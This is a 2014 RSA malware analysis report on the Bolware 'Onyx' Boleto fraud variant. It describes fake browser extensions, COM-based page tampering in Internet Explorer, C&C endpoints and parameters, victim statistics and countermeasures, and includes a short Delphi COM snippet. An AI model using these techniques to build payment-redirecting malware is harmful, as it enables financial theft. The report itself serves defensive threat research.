RSA Report: Bolware – Onyx Variant
16
BOLWARE – “ONYX” VARIANT December 2014 RSA ® Research Group
-
Upload
vmware -
Category
Technology
-
view
287 -
download
1
Transcript of RSA Report: Bolware – Onyx Variant
BOLWARE – “ONYX” VARIANT December 2014
RSA® Research Group
Page 2
TABLE OF CONTENTS Executive Summary .......................................................................................................... 3 Comparison ..................................................................................................................... 5 Malware Installation, Protective Mechanisms and Persistency Techniques ................................. 5 Communication and Network Behavior ................................................................................. 7 Barcode Replacement ........................................................................................................ 9 Command andControl Server Infrastructure ........................................................................ 10 Retrieved Data Statistics ................................................................................................... 11 Countermeasures ............................................................................................................ 13 Recommended User Vigilance ............................................................................................ 14 Authors .......................................................................................................................... 15
Page 3
EXECUTIVE SUMMARY As mentioned in the previous report published by RSA (https://blogs.rsa.com/rsa-uncovers-boleto-fraud-ring-brazil/), Boleto malware is a fraud operation and financial threat that has appeared in recent years in Brazil. The malware family known as "Eupuds" by some AV engines has attacked thousands of victims, causing serious losses to both the banking system and its customers.
These losses are caused not only by the "Eupuds" family, but by other types of the Boleto malware as well.
This report contains information about a different family of Boleto malware, known as "Onyx". The basic idea is the same: replace Boleto information in order to redirect the payments from the victim. However, unlike "Eupuds" which injects malicious code into the different web browsers (Chrome, Firefox and Internet Explorer (IE)) memory during runtime, this kind of malware uses other mechanisms to infect the victim's machine, depending on the targeted web browser.
If the target browser is either Chrome or Firefox, the malware will be installed as an extension and will execute its javascript code.
On the other hand, if the target is Microsoft’s Internet Explorer®, the malware will change the Boleto information by using the COM (Component Object Model) interface with the browser.
Other differences are that "Eupuds" malware family modifies the Boleto bank code and this family variant does not. The first one invalidates the Boleto barcode by adding HTML comments between the black and white bar images that represent the barcode and the latter either downloads a full barcode image from a malicious server or tries to compose a new barcode with black and white bars.
The altered Boleto will look like this:
Page 4
Dozens of samples of this family have been found and they are at different levels of development. Their features vary among the samples and they point to different Command and Control (C&C) servers. However, all of them have the same communication protocol with the servers, which indicates that these samples are likely to refer to malware which is still under development.
In this report we will list the most important features of this malware family and will analyze one of the C&C servers.
Figure 1
Altered Boleto
Page 5
COMPARISON
Bolware “Ruby” (aka Eupuds) Bolware “Onyx”
Bank Code Replace Do not Replace
Typeable Line Replace Replace
Barcode Do not Replace Replace (some versions put an extra one at the bottom)
Protocol XML Obfuscated with a XOR key over HTTP Plain text over HTTP
Server Centralized dedicated server (multiple IPs on the same server) Multiple servers (hacked websites)
C&C PHP + MySQL PHP + Plain Text Storage
Dataflow Affected On Generation (on GET
response) and on Submission (on POST requests)
On Generation (on GET response)
User Credentials Targeted Live.com Do not Support
Infection Mechanism CreateRemoteThread() on process
Chrome / Firefox -‐ Browser Extension and IE -‐ COM Interface
Affected Browsers Chrome / Firefox / IE Chrome / Firefox / IE
Affected OS Windows Windows, however the extension works also for MAC OS and LINUX
MALWARE INSTALLATION, PROTECTIVE MECHANISMS AND PERSISTENCY TECHNIQUES The installation process depends on the targeted browser. The malware is installed as an extension and pretends to be Flash Player in Chrome and Firefox:
Page 6
The same extension used as a payload by the malware can infect Linux and Mac OS, since it’s written in JavaScript using the browser's API, but no malware was identified that was able to deploy this payload in different platforms.
Once properly installed in the victim's browser, the malicious extension will search and replace Boleto related information (typeable line and barcode) in order to redirect payments.
In Chrome, the manifest.json extension configuration file points to a background page called "popup.html" (with permissions to monitor tabs, all URLs, navigation and requests), which will execute a javascript called "popup.js". This javascript uses Chrome APIs to do the fraud:
chrome.webRequest.onCompleted.addListener(...)
Where:
• chrome.webRequest is the API to observe and analyze traffic and to intercept and modify requests in-flight
• onCompleted fires when a request has been processed successfully • addListener is used to register an event listener for a web request
The API takes a callback and some filters as arguments. The callback calls a javascript called "getPagesSource.js", which will:
• retrieve the DOM object from the page and convert it to string • use regular expressions to search for Boleto information in the page opened by
the browser • retrieve the fake typeable line from the C&C server • replace the typeable line • calculate and replace the barcode • send information back to the C&C server (browser, original typeable line,
modified typeable line, value, due data and URL)
Figure 2
Fake Chrome extension
Figure 3
Fake Firefox extension
Page 7
In Firefox, the process is almost the same. The "install.rdf" extension configuration file contains information to install the malware as a plugin and the file "stylebar.xul" will point to a javascript called "stylebar.js" that will perform the same logic that "getPagesSource.js" does.
On the other hand if the IE browser is running:
• Initialize the COM interface • Search for iexplore.exe process • Retrieve a Boleto number from the server • Connect to IE and retrieve the existing page • Replace the Boleto number and barcode • Notify the C&C server what was the original Boleto and the new one
Example of code in Delphi that uses the COM interface to retrieve an HTML page from the browser:
"""
uses ShDocVw_Tlb; // or ShDocVw if Doc = Nil then exit; if Doc.body = Nil then exit; var i: Integer; Browser: IWebBrowser2; ShellWindows: IShellWindows; Doc : IHtmlDocument2; ShellWindows := CoShellWindows.Create; for i := 0 to ShellWindows.Count -‐ 1 do if Supports(ShellWindows.Item(i), IWebBrowser2, Browser) then begin // do something with Browser instance, e.g compare the Url you're // expecting with Browser.LocationUrl // if it is, then you can get at the Html by something like Browser.Document.QueryInterface(IHtmlDocument2, Doc); if (Doc <> Nil) and (Doc.Body <> Nil) then // access any of the Doc's properties, e.g. InnerHtml end; """
COMMUNICATION AND NETWORK BEHAVIOR After the malware infects the browser, it starts the communication with the C&C server through HTTP messages. The first message is a notification that is sent by the malware to the server as soon as the malware gets active. This is done by sending a GET to "notify.php":
Page 8
After the notification is sent, a text file is created on the victim's machine in order to prevent multiple notifications for the same victim.
The subsequent messages will occur when the malware detects a Boleto operation in the browser and their purpose is to replace the Boleto information (typeable line and barcode) to redirect payments.
First, the malware will request the typeable line to replace, by sending a GET to "boleto.php?LETO":
After that, the malware sends some information about the Boleto to the server, by sending a POST to "boleto.php":
Figure 4
Notification message
Figure 5
Typeable line request
Figure 6
Transaction information
Page 9
Where:
O=<original typeable line>
N=<new typeable line>
V=<value>
P=<due date>
U=<url>
Z=<browser>
BARCODE REPLACEMENT As well as the "Eupuds" type, this family also replaces the Boleto barcode.
Some samples submit the modified typeable line to the malicious server in order to retrieve the corresponding barcode (as an image) to replace it in the original Boleto
On the other hand, some of the samples simply download a fake and fixed barcode (as an image) so that the victim will be forced to use the modified typeable line to do the payment:
Figure 7
Replacement by a corresponding barcode
Page 10
Some samples search for strings like "autenticacao mecanica" (which means "mechanical authentication" in Portuguese, it is where the barcode is usually located) and its variations (capital letters and accents in the words) in order to search and replace the barcode in the Boleto document.
C&C SERVER INFRASTRUCTURE The server side control panel is very simple and allows the botmaster access to manage the botnet and review compromised data. The malware has the information publicly accessible through links in the C&C server.
Latest transaction activities (latest Boleto changes) can be accessed by sending a GET to "boleto.php?123" to the server, which reveals information like date, time, browser, original typeable line, modified typeable line, value, due data and URL:
Figure 8
Replacement by a fixed barcode
Figure 9
Latest Boleto changes
Page 11
On the other hand, latest victim's information can be accessed by sending a GET to "visualizador.php?ver", which gives back a UI to see the recently infected victims (date, IP address, hostname and HTTP referrer):
The data seems to be removed from time to time, allowing only a partial view of the data on the server corresponding to a period of time.
RETRIEVED DATA STATISTICS The data retrieved from the server reveals interesting information about this family of the “Boleto” malware and its victims.
Following are the infected browsers:
Figure 10
Latest infection information
Page 12
As well as the "Eupuds" variant, this family also targets the Brazilian market (citizens and companies). Most of the victims are Brazilian residents, however Brazilian citizens who live abroad were infected as well. All of them are able to generate a “Boleto” online and pay it through the Brazilian online banking system.
Figure 11
Infected browsers
Figure 12
Infection by country
Page 13
As shown in the map below, the malware is nationwide distributed, but it’s concentrated in the high populated areas. The infection map looks very similar to the "Eupuds" malware distribution:
During this period the total number of victims infected by this C&C was 3,072.
The following diagram displays the daily malware activity (number of infected transactions) of one of the C&C servers during the last month (period from August 5th until September 1st):
It is important to mention that these values and statistics refer to only one C&C server. A total number of 50 samples and 16 C&C servers have been monitored during the latest 2 months by RSA researchers, so the malware activity involved in this fraud is likely to exceed the period mentioned in this report.
COUNTERMEASURES RSA FraudAction Service™ can help with shutting down Boleto infection points in the wild and blacklisting Boleto IDs. FraudAction provides a blacklist feed of all altered Boleto ID numbers by the Boleto malware. As fraudsters feed new Boleto IDs into the malware, FraudAction service updates the blacklist feed. The altered fraudulent Boletos contain information that the banks can use to proactively block further payment of such Boleto and to track the account that received the fraudulent payment and prevent further payments to this account and cashing out.
Figure 13
Infection in Brazil
Figure 14
Activity by day
Page 14
RSA® Security Analytics can help only if the Boleto malware is on employee machines and not customers.
RSA Security Analytics is designed to monitor all the communication to/from the organization to the Boleto malware C&C server, and can spot fraudulent activities by using Boleto IOCs that are in the RSA Live feed. The feed will be updated as needed, providing threat intelligence to organizations experiencing possible Boleto malware infection.
RSA LIVE feed info regarding Boleto fraud is as follows:
• Feed: RSA FirstWatch Command and Control IPs o Pivot: threat.desc = c2-ip-bolware
• Feed: RSA FirstWatch Command and Control Domains o Pivot: threat.desc = c2-domain-bolware
RSA® ECAT is engineered to help only if the Boleto malware is on employee machines and not customers.
RSA ECAT can detect the presence of Boleto malware on end user/employee devices based on the Boleto malware IOCs.
RECOMMENDED USER VIGILANCE 1. Double check the Boleto ID, using the following information that could help in detecting
a fraudulent Boleto: • Compare the first 4 digits with previous Boletos from the same issuing company:
these digits identify the destination Bank, and they will usually be the same every month.
• For a given issuing company (e.g., a credit card bill or a Boleto from the kids’ school), compare the first half of Boleto digits (usually the first 21 digits) with previous payments from the same company, since these digits identify the payee’s destination account. These digits are usually the same from accounts that the user paid in previous months.
2. Avoid accessing websites that propose to generate new Boletos out of overdue Boletos. Please check with your bank the best process to pay an overdue Boleto.
3. Try using the Authorized Direct Debit (DDA) method as much as possible to replace the traditional Boleto payment method.
4. Never trust emails that you aren't expecting, don’t click on any suspicious links. 5. Be wary of websites which are requesting information that they don’t need. 6. Download and install software patches periodically from reliable sources (preferably ask
the software to update itself). 7. Install Anti-Virus software from a reliable source, verify it’s enabled and update it
periodically. According to Microsoft®, customers using Windows Security Essentials® are protected from this malware.
8. Scan your PC with Anti-Malware software on a constant basis.
Page 15
AUTHORS Jonathan Zkez
James Winston
Content and liability disclaimer
This Research Paper is for general information purposes only, and should not be used as a substitute for consultation with professional advisors. EMC has exercised reasonable care in the collecting, processing, and reporting of this information but has not independently verified, validated, or audited the data to verify the accuracy or completeness of the information. EMC shall not be responsible for any errors or omissions contained on this Research Paper, and reserves the right to make changes anytime without notice. Mention of non-EMC products or services is provided for informational purposes only and constitutes neither an endorsement nor a recommendation by EMC. All EMC and third-party information provided in this Research Paper is provided on an "as is" basis.
EMC DISCLAIMS ALL WARRANTIES, EXPRESSED OR IMPLIED, WITH REGARD TO ANY INFORMATION (INCLUDING ANY SOFTWARE, PRODUCTS, OR SERVICES) PROVIDED IN THIS RESEARCH PAPER, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. Some jurisdictions do not allow the exclusion of implied warranties, so the above exclusion may not apply to you.
In no event shall EMC be liable for any damages whatsoever, and in particular EMC shall not be liable for direct, special, indirect, consequential, or incidental damages, or damages for lost profits, loss of revenue or loss of use, cost of replacement goods, loss or damage to data arising out of the use or inability to use any EMC website, any EMC product or service. This includes damages arising from use of or in reliance on the documents or information present on this Research Paper, even if EMC has been advised of the possibility of such damages
www.rsa.com
ABOUT RSA
RSA’s Intelligence Driven Security solutions help organizations reduce the risks of operating in a digital world. Through visibility, analysis, and action, RSA solutions give customers the ability to detect, investigate and respond to advanced threats; confirm and manage identities; and ultimately, prevent IP theft, fraud and cybercrime. For more information on RSA, please visit www.rsa.com.
EMC2, EMC, RSA and the RSA logo are registered trademarks or trademarks of EMC Corporation in the United States and other countries. All other trademarks used herein are the property of their respective owners. ©2014 EMC Corporation. All rights reserved. Published in the USA.
H13742
